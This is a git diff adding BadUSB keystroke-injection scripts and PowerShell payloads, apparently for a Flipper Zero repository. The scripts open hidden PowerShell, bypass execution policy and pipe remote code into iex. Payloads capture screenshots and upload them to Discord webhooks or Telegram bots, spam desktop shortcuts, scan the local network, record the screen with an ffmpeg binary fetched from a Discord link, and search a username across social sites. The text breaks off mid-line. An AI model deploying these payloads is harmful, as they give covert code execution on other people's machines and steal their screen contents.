+$startip.name="startrange" + +$endip = New-Object System.Windows.Forms.TextBox +$endip.Location = New-Object System.Drawing.Point(230, 35) +$endip.BackColor = "#eeeeee" +$endip.Width = 50 +$endip.Height = 40 +$endip.Text = "254" +$endip.Multiline = $false +$endip.Font = 'Microsoft Sans Serif,8,style=Bold' +$endip.add_MouseHover($showhelp) +$endip.name="endrange" + +#==================================================== Define GUI Elements ========================================================== + +$MainWindow.controls.AddRange(@($TextBoxInput, $startip, $endip, $StartScan, $sshboxtext, $sshbox, $manufacturerboxtext, $manufacturerbox, $hostnameboxtext, $hostnamebox, $OutputBox, $TextboxInputHeader, $dashline)) + +#==================================================== Click Functions ========================================================== + +$StartScan.Add_Click({ + +Function Add-OutputBoxLine{ + Param ($outfeed) + $OutputBox.AppendText("`r`n$outfeed") + $OutputBox.Refresh() + $OutputBox.ScrollToCaret() +} +Add-OutputBoxLine -Outfeed "Starting scan..." + +$FileOut = "$env:temp\Computers.csv" +$Subnet = $TextBoxInput.Text +$a=[int]$startip.text +$b=[int]$endip.text + +$a..$b|ForEach-Object{ + Start-Process -WindowStyle Hidden ping.exe -Argumentlist "-n 1 -l 0 -f -i 2 -w 100 -4 $SubNet$_" +} +$Computers = (arp.exe -a | Select-String "$SubNet.*dynam") -replace ' +',','| + ConvertFrom-Csv -Header Computername,IPv4,MAC,x,Vendor| + Select IPv4,MAC +$Computers | Export-Csv $FileOut -NotypeInformation + +if($sshbox.Checked){ + +$data = Import-Csv "$env:temp\Computers.csv" +$data | Add-Member -MemberType NoteProperty -Name "ssh" -Value "" +$data | ForEach-Object { + $ip = $_.'IPv4' + try { + $tcpClient = New-Object System.Net.Sockets.TcpClient + $timeout = 2 * 1000 # 2 seconds timeout + $asyncResult = $tcpClient.BeginConnect($ip, 22, $null, $null) + $wait = $asyncResult.AsyncWaitHandle.WaitOne($timeout, $false) + if ($wait) { + $tcpClient.EndConnect($asyncResult) + $ssh = "Yes" + } else { + $ssh = "No" + } + $tcpClient.Close() + } catch { + $ssh = "Closed" + } + $_ | Add-Member -MemberType NoteProperty -Name "ssh" -Value $ssh -force +} +$data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation +} + +if($manufacturerbox.Checked){ + +$data = Import-Csv "$env:temp\Computers.csv" +$data | Add-Member -MemberType NoteProperty -Name "manufacturer" -Value "" +$data | ForEach-Object { + + $mac = $_.'MAC' + $apiUrl = "https://api.macvendors.com/" + $mac + $manufacturer = (Invoke-WebRequest -Uri $apiUrl).Content + start-sleep 1 + $_ | Add-Member -MemberType NoteProperty -Name "manufacturer" -Value $manufacturer -force +} +$data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation +} + + +if($hostnamebox.Checked){ + +$data = Import-Csv "$env:temp\Computers.csv" +$data | Add-Member -MemberType NoteProperty -Name "Hostname" -Value "" +$data | ForEach-Object { + try{ + $ip = $_.'IPv4' + $hostname = ([System.Net.Dns]::GetHostEntry($ip)).HostName + $_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value $hostname -force + } catch{ + $_ | Add-Member -MemberType NoteProperty -Name "Hostname" -Value "Error: $($_.Exception.Message)" + } +} +$data | Export-Csv "$env:temp\Computers.csv" -NoTypeInformation +} + +$textfile = Get-Content "$env:temp\Computers.csv" -Raw + +Add-OutputBoxLine -Outfeed "$textfile" + +}) + +#===================================================== Initialize Script =================================================== + +$MainWindow.ShowDialog() | Out-Null +exit diff --git a/Record-Screen-GUI/README.md b/Record-Screen-GUI/README.md new file mode 100644 index 0000000..ee8a48b --- /dev/null +++ b/Record-Screen-GUI/README.md @@ -0,0 +1,13 @@ + +Screen Recorder GUI
+ +SYNOPSIS + +A customizable gui for screen recording with ffmpeg.exe + +USAGE + +1. Run script. +2. in GUI click 'Get ffmpeg.exe' +3. input desired variables and click start +4. Timestamped output file will be in the same folder as the script. diff --git a/Record-Screen-GUI/Record-Screen-GUI.txt b/Record-Screen-GUI/Record-Screen-GUI.txt new file mode 100644 index 0000000..27f4841 --- /dev/null +++ b/Record-Screen-GUI/Record-Screen-GUI.txt @@ -0,0 +1,16 @@ +REM Title: beigeworm's Screen Recorder GUI Tool. +REM Author: @beigeworm +REM Description: This script creates a GUI window for recording the screen to .mkv file. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Record-Screen-GUI/main.ps1 | iex +ENTER + + diff --git a/Record-Screen-GUI/main.ps1 b/Record-Screen-GUI/main.ps1 new file mode 100644 index 0000000..49d1034 --- /dev/null +++ b/Record-Screen-GUI/main.ps1 @@ -0,0 +1,162 @@ +$Import = '[DllImport("user32.dll")] public static extern bool ShowWindow(int handle, int state);'; +add-type -name win -member $Import -namespace native; +[native.win]::ShowWindow(([System.Diagnostics.Process]::GetCurrentProcess() | Get-Process).MainWindowHandle, 0); + +Add-Type -AssemblyName System.Windows.Forms +$form = New-Object Windows.Forms.Form +$form.Text = " BeigeTools | Screen Recorder " +$form.Font = 'Microsoft Sans Serif,12,style=Bold' +$form.Size = New-Object Drawing.Size(350, 200) +$form.StartPosition = 'Manual' +$form.BackColor = [System.Drawing.Color]::Black +$form.ForeColor = [System.Drawing.Color]::White +$form.FormBorderStyle = [System.Windows.Forms.FormBorderStyle]::FixedDialog + +$Text = New-Object Windows.Forms.Label +$Text.Text = "Framerate" +$Text.AutoSize = $true +$Text.Font = 'Microsoft Sans Serif,10' +$Text.Location = New-Object System.Drawing.Point(15, 20) +$fps = New-Object Windows.Forms.Label +$fps.Text = "fps" +$fps.AutoSize = $true +$fps.Font = 'Microsoft Sans Serif,10' +$fps.Location = New-Object System.Drawing.Point(60, 40) + +$frBox = New-Object System.Windows.Forms.TextBox +$frBox.Location = New-Object System.Drawing.Point(18, 40) +$frBox.BackColor = "#eeeeee" +$frBox.Width = 40 +$frBox.Text = "25" +$frBox.Multiline = $false +$frBox.Font = 'Microsoft Sans Serif,8,style=Bold' + +$Text2 = New-Object Windows.Forms.Label +$Text2.Text = "Record Time" +$Text2.Font = 'Microsoft Sans Serif,10' +$Text2.AutoSize = $true +$Text2.Location = New-Object System.Drawing.Point(120, 20) +$sec = New-Object Windows.Forms.Label +$sec.Text = "s" +$sec.AutoSize = $true +$sec.Font = 'Microsoft Sans Serif,10' +$sec.Location = New-Object System.Drawing.Point(165, 40) + +$tBox = New-Object System.Windows.Forms.TextBox +$tBox.Location = New-Object System.Drawing.Point(123, 40) +$tBox.BackColor = "#eeeeee" +$tBox.Width = 40 +$tBox.Text = "30" +$tBox.Multiline = $false +$tBox.Font = 'Microsoft Sans Serif,8,style=Bold' + +$Text3 = New-Object Windows.Forms.Label +$Text3.Text = "Offset X" +$Text3.Font = 'Microsoft Sans Serif,10' +$Text3.AutoSize = $true +$Text3.Location = New-Object System.Drawing.Point(15, 70) +$ofx = New-Object Windows.Forms.Label +$ofx.Text = "px" +$ofx.AutoSize = $true +$ofx.Font = 'Microsoft Sans Serif,10' +$ofx.Location = New-Object System.Drawing.Point(60, 90) + +$oxBox = New-Object System.Windows.Forms.TextBox +$oxBox.Location = New-Object System.Drawing.Point(18, 90) +$oxBox.BackColor = "#eeeeee" +$oxBox.Width = 40 +$oxBox.Text = "0" +$oxBox.Multiline = $false +$oxBox.Font = 'Microsoft Sans Serif,8,style=Bold' + +$Text4 = New-Object Windows.Forms.Label +$Text4.Text = "Offset Y" +$Text4.Font = 'Microsoft Sans Serif,10' +$Text4.AutoSize = $true +$Text4.Location = New-Object System.Drawing.Point(120, 70) +$ofy = New-Object Windows.Forms.Label +$ofy.Text = "px" +$ofy.AutoSize = $true +$ofy.Font = 'Microsoft Sans Serif,10' +$ofy.Location = New-Object System.Drawing.Point(165, 90) + +$oyBox = New-Object System.Windows.Forms.TextBox +$oyBox.Location = New-Object System.Drawing.Point(123, 90) +$oyBox.BackColor = "#eeeeee" +$oyBox.Width = 40 +$oyBox.Text = "0" +$oyBox.Multiline = $false +$oyBox.Font = 'Microsoft Sans Serif,8,style=Bold' + +$Text5 = New-Object Windows.Forms.Label +$Text5.Text = "Video Size" +$Text5.Font = 'Microsoft Sans Serif,10' +$Text5.AutoSize = $true +$Text5.Location = New-Object System.Drawing.Point(15, 120) + +$vsBox = New-Object System.Windows.Forms.TextBox +$vsBox.Location = New-Object System.Drawing.Point(18, 140) +$vsBox.BackColor = "#eeeeee" +$vsBox.Width = 140 +$vsBox.Text = "1920x1080" +$vsBox.Multiline = $false +$vsBox.Font = 'Microsoft Sans Serif,8,style=Bold' + +$Download = New-Object Windows.Forms.Button +$Download.Text = "Get ffmpeg.exe" +$Download.Width = 120 +$Download.Height = 30 +$Download.BackColor = [System.Drawing.Color]::White +$Download.ForeColor = [System.Drawing.Color]::Black +$Download.Location = New-Object System.Drawing.Point(210, 50) +$Download.Font = 'Microsoft Sans Serif,10,style=Bold' + +$Check = New-Object Windows.Forms.Button +$Check.Text = "Check Files" +$Check.Width = 120 +$Check.Height = 30 +$Check.BackColor = [System.Drawing.Color]::White +$Check.ForeColor = [System.Drawing.Color]::Black +$Check.Location = New-Object System.Drawing.Point(210, 90) +$Check.Font = 'Microsoft Sans Serif,10,style=Bold' + +$startrecord = New-Object Windows.Forms.Button +$startrecord.Text = "Start" +$startrecord.Width = 120 +$startrecord.Height = 30 +$startrecord.BackColor = [System.Drawing.Color]::White +$startrecord.ForeColor = [System.Drawing.Color]::Black +$startrecord.Location = New-Object System.Drawing.Point(210, 130) +$startrecord.Font = 'Microsoft Sans Serif,10,style=Bold' + +$form.Controls.AddRange(@($Text,$fps,$frBox,$Text2,$sec,$tbox,$Text3,$ofx,$oxBox,$Text4,$ofy,$oyBox,$Text5,$vsBox,$Download,$Check,$startrecord)) + + +$Download.Add_Click{ +$Path = "$env:Temp\ffmpeg.exe" +If (!(Test-Path $Path)){ +$url = "https://cdn.discordapp.com/attachments/803285521908236328/1089995848223555764/ffmpeg.exe" +iwr -Uri $url -OutFile $Path +} +} + +$Check.Add_Click{ +$Path = "$env:Temp\ffmpeg.exe" +If (!(Test-Path $Path)){msg.exe * 'Not Installed'} +else {msg.exe * 'Installed'} +} + +$startrecord.Add_Click{ +$timestamp = Get-Date -Format "yyyyMMdd-HHmmss" +$mkvPath = "Clip_$timestamp.mkv" + +if ($t.Length -eq 0){$t = 10} +if ($fr.Length -eq 0){$fr = 25} +if ($ox.Length -eq 0){$ox = 0} +if ($oy.Length -eq 0){$oy = 0} +if ($vs.Length -eq 0){$vs = "1920x1080"} + +.$env:Temp\ffmpeg.exe -f gdigrab -framerate $fr -t $t -offset_x $ox -offset_y $oy -video_size $vs -show_region 1 -i desktop $mkvPath +} + +$form.ShowDialog() \ No newline at end of file diff --git a/Screen-to-Discord/README.md b/Screen-to-Discord/README.md new file mode 100644 index 0000000..dbeb057 --- /dev/null +++ b/Screen-to-Discord/README.md @@ -0,0 +1,10 @@ + +Screenshot to Discord
+ +SYNOPSIS + +Takes a screenshot of the desktop and posts to a discord webhook. + +SETUP + +1. replace DISCORD_WEBHOOK_HERE with your Discord Webhook. diff --git a/Screen-to-Discord/Screenshot-to-Discord.txt b/Screen-to-Discord/Screenshot-to-Discord.txt new file mode 100644 index 0000000..bd9ef50 --- /dev/null +++ b/Screen-to-Discord/Screenshot-to-Discord.txt @@ -0,0 +1,20 @@ + +REM Title: Screenshot to discord webhook +REM Author: @beigeworm +REM Description: This script takes a screenshot of the desktop and posts to a discord webhook. +REM Target: Windows 10 + +REM *SETUP* +REM replace DISCORD_WEBHOOK_HERE with your Discord Webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $dc='DISCORD_WEBHOOK_HERE'; irm https://is.gd/bw_sc_to_dc | iex +ENTER + + diff --git a/Screen-to-Discord/main.ps1 b/Screen-to-Discord/main.ps1 new file mode 100644 index 0000000..9164f5b --- /dev/null +++ b/Screen-to-Discord/main.ps1 @@ -0,0 +1,24 @@ +$hookurl = "$dc" +$seconds = 30 # Screenshot interval +$a = 1 # Sceenshot amount + +While ($a -gt 0){ +$Filett = "$env:temp\SC.png" +Add-Type -AssemblyName System.Windows.Forms +Add-type -AssemblyName System.Drawing +$Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen +$Width = $Screen.Width +$Height = $Screen.Height +$Left = $Screen.Left +$Top = $Screen.Top +$bitmap = New-Object System.Drawing.Bitmap $Width, $Height +$graphic = [System.Drawing.Graphics]::FromImage($bitmap) +$graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size) +$bitmap.Save($Filett, [System.Drawing.Imaging.ImageFormat]::png) +Start-Sleep 1 +curl.exe -F "file1=@$filett" $hookurl +Start-Sleep 1 +Remove-Item -Path $filett +Start-Sleep $seconds +$a-- +} diff --git a/Screen-to-Telegram/README.md b/Screen-to-Telegram/README.md new file mode 100644 index 0000000..c757880 --- /dev/null +++ b/Screen-to-Telegram/README.md @@ -0,0 +1,10 @@ + +Screenshot to Telegram
+ +SYNOPSIS + +Takes a screenshot of the desktop and posts to a Telegram bot chat. + +SETUP + +1. replace TELEGRAM_TOKEN_HERE with your Telegram token. diff --git a/Screen-to-Telegram/Screenshot-to-Telegram.txt b/Screen-to-Telegram/Screenshot-to-Telegram.txt new file mode 100644 index 0000000..1e17d0d --- /dev/null +++ b/Screen-to-Telegram/Screenshot-to-Telegram.txt @@ -0,0 +1,20 @@ + +REM Title: Screenshot to Telegram Bot Chat +REM Author: @beigeworm +REM Description: This script takes a screenshot of the desktop and posts to a Telegram Bot Chat. +REM Target: Windows 10 + +REM *SETUP* +REM replace TELEGRAM_TOKEN_HERE with your Telegram Token. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C $tg='TELEGRAM_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Screen-to-Telegram/main.ps1 | iex +ENTER + + diff --git a/Screen-to-Telegram/main.ps1 b/Screen-to-Telegram/main.ps1 new file mode 100644 index 0000000..d23605a --- /dev/null +++ b/Screen-to-Telegram/main.ps1 @@ -0,0 +1,31 @@ + +$seconds = 30 # Screenshot interval +$a = 1 # Sceenshot amount + +$Token = "$tg" +$URL='https://api.telegram.org/bot{0}' -f $Token +while($chatID.length -eq 0){ +$updates = Invoke-RestMethod -Uri ($url + "/getUpdates") +if ($updates.ok -eq $true) {$latestUpdate = $updates.result[-1] +if ($latestUpdate.message -ne $null){$chatID = $latestUpdate.message.chat.id}} +Sleep 10 +} + +While ($a -gt 0){ + +Add-Type -AssemblyName System.Windows.Forms +$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen +$bitmap = New-Object Drawing.Bitmap $screen.Width, $screen.Height +$graphics = [System.Drawing.Graphics]::FromImage($bitmap) +$graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $screen.Size) +$filePath = "$env:temp\sc.png" +$bitmap.Save($filePath, [System.Drawing.Imaging.ImageFormat]::Png) +$graphics.Dispose() +$bitmap.Dispose() + +curl.exe -F chat_id="$ChatID" -F document=@"$filePath" "https://api.telegram.org/bot$Token/sendDocument" | Out-Null +Remove-Item -Path $filePath + +Start-Sleep $seconds +$a-- +} diff --git a/Shortcut-Spam/Desktop-Shortcut-Spam.txt b/Shortcut-Spam/Desktop-Shortcut-Spam.txt new file mode 100644 index 0000000..7705b04 --- /dev/null +++ b/Shortcut-Spam/Desktop-Shortcut-Spam.txt @@ -0,0 +1,16 @@ +REM Title: beigeworm's Desktop Shortcut Spammer. +REM Author: @beigeworm +REM Description: This script creates 100 shortcuts on the users Desktop. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Shortcut-Spam/main.ps1 | iex +ENTER + + diff --git a/Shortcut-Spam/README.md b/Shortcut-Spam/README.md new file mode 100644 index 0000000..4bc44ad --- /dev/null +++ b/Shortcut-Spam/README.md @@ -0,0 +1,12 @@ + +Simple Shortcut Bomb
+ + +SYNOPSIS + +This script will create 200 shortcuts on the desktop very quickly. + +USAGE + +1. Change '100' to the number of shortcuts you want created +2. Run the script. \ No newline at end of file diff --git a/Shortcut-Spam/main.ps1 b/Shortcut-Spam/main.ps1 new file mode 100644 index 0000000..11b9deb --- /dev/null +++ b/Shortcut-Spam/main.ps1 @@ -0,0 +1,18 @@ +$n = 100 +$i = 0 + +while($i -lt $n) +{ +$num = Get-Random +$Location = "C:\Windows\System32\rundll32.exe" +$WshShell = New-Object -ComObject WScript.Shell +$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\USB Hardware" + $num + ".lnk") +$Shortcut.TargetPath = $Location +$Shortcut.Arguments ="shell32.dll,Control_RunDLL hotplug.dll" +$Shortcut.IconLocation = "hotplug.dll,0" +$Shortcut.Description ="Device Removal" +$Shortcut.WorkingDirectory ="C:\Windows\System32" +$Shortcut.Save() +Start-Sleep -Milliseconds 10 +$i++ +} diff --git a/Social-Search-GUI/README.md b/Social-Search-GUI/README.md new file mode 100644 index 0000000..d55a5bb --- /dev/null +++ b/Social-Search-GUI/README.md @@ -0,0 +1,12 @@ + +Social Search GUI
+ +SYNOPSIS + +This script presents a GUI for searching popular websites with a single username.. + +USAGE + +1. Run script with powershell +2. Input your desired username +3. Press "Start Search" diff --git a/Social-Search-GUI/Username-Search-GUI.txt b/Social-Search-GUI/Username-Search-GUI.txt new file mode 100644 index 0000000..b64367f --- /dev/null +++ b/Social-Search-GUI/Username-Search-GUI.txt @@ -0,0 +1,16 @@ +REM Title: beigeworm's Username Search GUI Tool. +REM Author: @beigeworm +REM Description: This script creates a GUI for searching social media and other sites with a specified Username. +REM Target: Windows 10 + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove "-W H" to show the window) +DELAY 1000 +GUI r +DELAY 750 +STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Social-Search-GUI/main.ps1 | iex +ENTER + + diff --git a/Social-Search-GUI/main.ps1 b/Social-Search-GUI/main.ps1 new file mode 100644 index 0000000..821e63f --- /dev/null +++ b/Social-Search-GUI/main.ps1 @@ -0,0 +1,299 @@ +Add-Type -AssemblyName System.Windows.Forms +Add-Type -AssemblyName System.Drawing +Add-Type -AssemblyName Microsoft.VisualBasic +[System.Windows.Forms.Application]::EnableVisualStyles() + +$MainWindow = New-Object System.Windows.Forms.Form +$MainWindow.ClientSize = '690,700' +$MainWindow.Text = "| Beigetools | Social Search |" +$MainWindow.BackColor = "#242424" +$MainWindow.Opacity = 1 +$MainWindow.TopMost = $true +$MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\charmap.exe") + +$TextInput = New-Object System.Windows.Forms.TextBox +$TextInput.Location = New-Object System.Drawing.Point(20, 40) +$TextInput.BackColor = "#eeeeee" +$TextInput.Width = 370 +$TextInput.Height = 40 +$TextInput.Font = 'Microsoft Sans Serif,12,style=Bold' +$TextInput.add_MouseHover($showhelp) +$TextInput.name="input" + +$TextInputHeader = New-Object System.Windows.Forms.Label +$TextInputHeader.Text = "Username" +$TextInputHeader.ForeColor = "#bcbcbc" +$TextInputHeader.AutoSize = $true +$TextInputHeader.Width = 25 +$TextInputHeader.Height = 10 +$TextInputHeader.Location = New-Object System.Drawing.Point(20, 20) +$TextInputHeader.Font = 'Microsoft Sans Serif,10,style=Bold' + +$OutputBoxHeader = New-Object System.Windows.Forms.Label +$OutputBoxHeader.Text = "Results" +$OutputBoxHeader.ForeColor = "#bcbcbc" +$OutputBoxHeader.AutoSize = $true +$OutputBoxHeader.Width = 25 +$OutputBoxHeader.Height = 10 +$OutputBoxHeader.Location = New-Object System.Drawing.Point(20, 90) +$OutputBoxHeader.Font = 'Microsoft Sans Serif,10,style=Bold' + +$OutputBox = New-Object System.Windows.Forms.TextBox +$OutputBox.Multiline = $True; +$OutputBox.Location = New-Object System.Drawing.Size(20,110) +$OutputBox.Width = 650 +$OutputBox.Height = 570 +$OutputBox.Scrollbars = "Vertical" +$OutputBox.Font = 'Microsoft Sans Serif,12,style=Bold' + +$DecodeBT = New-Object System.Windows.Forms.Button +$DecodeBT.Text = "Start Search" +$DecodeBT.Width = 150 +$DecodeBT.Height = 35 +$DecodeBT.Location = New-Object System.Drawing.Point(520, 30) +$DecodeBT.Font = 'Microsoft Sans Serif,10,style=Bold' +$DecodeBT.BackColor = "#eeeeee" +$DecodeBT.add_MouseHover($showhelp) +$DecodeBT.name="decode" + +$MainWindow.controls.AddRange(@($TextInput,$DecodeBT,$OutputBox,$TextInputHeader,$OutputBoxHeader)) + + +$DecodeBT.Add_Click({ + +Function Add-OutputBoxLine{ + Param ($outfeed) + $OutputBox.AppendText("`r`n$outfeed") + $OutputBox.Refresh() + $OutputBox.ScrollToCaret() +} + + +$myArray = @( +"https://twitter.com/$userhandle", +"https://www.instagram.com/$userhandle/", +"https://ws2.kik.com/user/$userhandle/", +"https://medium.com/@$userhandle", +"https://pastebin.com/u/$userhandle/", +"https://www.patreon.com/$userhandle/", +"https://photobucket.com/user/$userhandle/library", +"https://www.pinterest.com/$userhandle/", +"https://myspace.com/$userhandle/", +"https://www.reddit.com/user/$userhandle/" +"https://2Dimensions.com/a/$userhandle" +"https://www.7cups.com/@$userhandle" +"https://www.9gag.com/u/$userhandle" +"https://about.me/$userhandle" +"https://independent.academia.edu/$userhandle" +"https://www.alik.cz/u/$userhandle" +"https://www.alltrails.com/members/$userhandle" +"https://www.anobii.com/$userhandle/profile" +"https://discussions.apple.com/profile/$userhandle" +"https://archive.org/details/@$userhandle" +"https://asciinema.org/~$userhandle" +"https://ask.fm/$userhandle" +"https://discuss.atom.io/u/$userhandle/summary" +"https://audiojungle.net/user/$userhandle" +"https://www.avizo.cz/$userhandle/" +"https://blip.fm/$userhandle" +"https://$userhandle.booth.pm/" +"https://www.behance.net/$userhandle" +"https://binarysearch.io/@/$userhandle" +"https://bitbucket.org/$userhandle/" +"https://$userhandle.blogspot.com" +"https://bodyspace.bodybuilding.com/$userhandle" +"https://www.bookcrossing.com/mybookshelf/$userhandle/" +"https://buzzfeed.com/$userhandle" +"https://www.cnet.com/profiles/$userhandle/" +"https://$userhandle.carbonmade.com" +"https://career.habr.com/$userhandle" +"https://beta.cent.co/@$userhandle" +"https://www.championat.com/user/$userhandle" +"https://www.chess.com/member/$userhandle" +"https://www.cloob.com/name/$userhandle" +"https://community.cloudflare.com/u/$userhandle" +"https://www.codecademy.com/profiles/$userhandle" +"https://www.codechef.com/users/$userhandle" +"https://www.codewars.com/users/$userhandle" +"https://www.colourlovers.com/lover/$userhandle" +"https://www.coroflot.com/$userhandle" +"https://www.countable.us/$userhandle" +"https://www.cracked.com/members/$userhandle/" +"https://$userhandle.crevado.com" +"https://dev.to/$userhandleali" +"https://www.dailymotion.com/$userhandle" +"https://www.designspiration.net/$userhandle/" +"https://$userhandle.deviantart.com" +"https://www.discogs.com/user/$userhandle" +"https://discuss.elastic.co/u/$userhandle" +"https://disqus.com/$userhandle" +"https://dribbble.com/$userhandle" +"https://www.duolingo.com/profile/$userhandle" +"https://ello.co/$userhandle" +"https://euw.op.gg/summoner/userName=$userhandle" +"https://www.eyeem.com/u/$userhandle" +"https://f3.cool/$userhandle/" +"https://www.facebook.com/$userhandle" +"https://facenama.com/$userhandle" +"https://www.flickr.com/people/$userhandle" +"https://flipboard.com/@$userhandle" +"https://fortnitetracker.com/profile/all/$userhandle" +"https://freelance.habr.com/freelancers/$userhandle" +"https://www.freelancer.com/api/users/0.1/users?usernames%5B%5D=$userhandle&compact=true" +"https://freesound.org/people/$userhandle/" +"https://www.gamespot.com/profile/$userhandle/" +"https://giphy.com/$userhandle" +"https://www.github.com/$userhandle" +"https://gitlab.com/$userhandle" +"https://gitee.com/$userhandle" +"http://en.gravatar.com/$userhandle" +"https://www.gumroad.com/$userhandle" +"https://gurushots.com/$userhandle/photos" +"https://hackaday.io/$userhandle" +"https://news.ycombinator.com/user?id=$userhandle" +"https://hackerone.com/$userhandle" +"https://hackerrank.com/$userhandle" +"https://www.house-mixes.com/profile/$userhandle" +"https://icq.im/$userhandle" +"https://www.ifttt.com/p/$userhandle" +"https://www.instructables.com/member/$userhandle" +"https://$userhandle.itch.io/" +"https://$userhandle.jimdosite.com" +"https://forums.kali.org/member.php?username=$userhandle" +"https://keybase.io/$userhandle" +"https://kik.me/$userhandle" +"https://www.linux.org.ru/people/$userhandle/profile" +"https://launchpad.net/~$userhandle" +"https://leetcode.com/$userhandle" +"https://letterboxd.com/$userhandle" +"https://lichess.org/@/$userhandle" +"https://$userhandle.livejournal.com" +"https://www.liveleak.com/c/$userhandle" +"https://lolchess.gg/profile/na/$userhandle" +"https://www.memrise.com/user/$userhandle/" +"https://www.mixcloud.com/$userhandle/" +"https://www.munzee.com/m/$userhandle" +"https://myanimelist.net/profile/$userhandle" +"https://www.myminifactory.com/users/$userhandle" +"https://myspace.com/$userhandle" +"https://www.native-instruments.com/forum/members?username=$userhandle" +"https://namemc.com/profile/$userhandle" +"https://blog.naver.com/$userhandle" +"https://$userhandle.newgrounds.com" +"https://notabug.org/$userhandle" +"https://www.openstreetmap.org/user/$userhandle" +"https://opensource.com/users/$userhandle" +"https://forums.pcgamer.com/members/?username=$userhandle" +"https://packagist.org/packages/$userhandle/" +"https://pastebin.com/u/$userhandle" +"https://www.patreon.com/$userhandle" +"https://www.periscope.tv/$userhandle/" +"https://www.pinkbike.com/u/$userhandle/" +"https://www.pinterest.com/$userhandle/" +"https://plug.dj/@/$userhandle" +"https://polarsteps.com/$userhandle" +"https://www.producthunt.com/@$userhandle" +"http://promodj.com/$userhandle" +"https://pypi.org/user/$userhandle" +"https://quizlet.com/$userhandle" +"https://raidforums.com/User-$userhandle" +"https://www.reddit.com/user/$userhandle" +"https://repl.it/@$userhandle" +"https://www.reverbnation.com/$userhandle" +"https://rubygems.org/profiles/$userhandle" +"https://www.scribd.com/$userhandle" +"https://$userhandle.slack.com" +"https://slashdot.org/~$userhandle" +"https://slideshare.net/$userhandle" +"https://soundcloud.com/$userhandle" +"https://sourceforge.net/u/$userhandle" +"https://www.sparkpeople.com/mypage.asp?id=$userhandle" +"https://speedrun.com/user/$userhandle" +"https://www.sporcle.com/user/$userhandle/people" +"https://open.spotify.com/user/$userhandle" +"https://robertsspaceindustries.com/citizens/$userhandle" +"https://steamcommunity.com/id/$userhandle" +"https://steamcommunity.com/groups/$userhandle" +"https://steamid.uk/profile/$userhandle" +"https://www.strava.com/athletes/$userhandle" +"https://forum.sublimetext.com/u/$userhandle" +"https://ch.tetr.io/u/$userhandle" +"https://tellonym.me/$userhandle" +"https://tiktok.com/@$userhandle" +"https://www.gotinder.com/@$userhandle" +"http://en.tm-ladder.com/$userhandle_rech.php" +"https://www.tradingview.com/u/$userhandle/" +"https://trello.com/$userhandle" +"https://tripadvisor.com/members/$userhandle" +"https://tryhackme.com/p/$userhandle" +"https://www.twitch.tv/$userhandle" +"https://ultimate-guitar.com/u/$userhandle" +"https://unsplash.com/@$userhandle" +"https://vsco.co/$userhandle" +"https://forum.velomania.ru/member.php?username=$userhandle" +"https://vero.co/$userhandle" +"https://vimeo.com/$userhandle" +"https://virgool.io/@$userhandle" +"https://www.virustotal.com/ui/users/$userhandle/trusted_users" +"https://www.warriorforum.com/members/$userhandle.html" +"https://weheartit.com/$userhandle" +"https://$userhandle.webnode.cz/" +"http://www.wikidot.com/user:info/$userhandle" +"https://www.wikipedia.org/wiki/User:$userhandle" +"https://community.windy.com/user/$userhandle" +"https://profiles.wordpress.org/$userhandle/" +"https://xboxgamertag.com/search/$userhandle" +"https://www.younow.com/$userhandle/" +"https://youpic.com/photographer/$userhandle/" +"https://www.youtube.com/$userhandle" +"https://www.zhihu.com/people/$userhandle" +"https://akniga.org/profile/$userhandle" +"https://allmylinks.com/$userhandle" +"https://aminoapps.com/u/$userhandle" +"http://www.authorstream.com/$userhandle/" +"https://www.couchsurfing.com/people/$userhandle" +"https://www.geocaching.com/p/default.aspx?u=$userhandle" +"https://gfycat.com/@$userhandle" +"https://www.hackster.io/$userhandle" +"https://www.interpals.net/$userhandle" +"http://www.jeuxvideo.com/profil/$userhandle?mode=infos" +"https://last.fm/user/$userhandle" +"https://forum.leasehackr.com/u/$userhandle/summary/" +"https://www.livelib.ru/reader/$userhandle" +"https://mastodon.cloud/@$userhandle" +"https://mastodon.social/@$userhandle" +"https://mastodon.technology/@$userhandle" +"https://mastodon.xyz/@$userhandle" +"https://www.mercadolivre.com.br/perfil/$userhandle" +"https://www.metacritic.com/user/$userhandle" +"https://mstdn.io/@$userhandle" +"https://www.nairaland.com/$userhandle" +"https://note.com/$userhandle" +"https://www.npmjs.com/~$userhandle" +"https://osu.ppy.sh/users/$userhandle" +"https://php.ru/forum/members/?username=$userhandle" +"https://pr0gramm.com/user/$userhandle" +"https://social.tchncs.de/@$userhandle" +"http://uid.me/$userhandle" +) + +$userhandle = $TextInput.Text +Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------" +Add-OutputBoxLine -outfeed "Searching Username:$userhandle Against Known Websites List..." +Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------" + +foreach ($i in $myArray) { +try{ + $response = 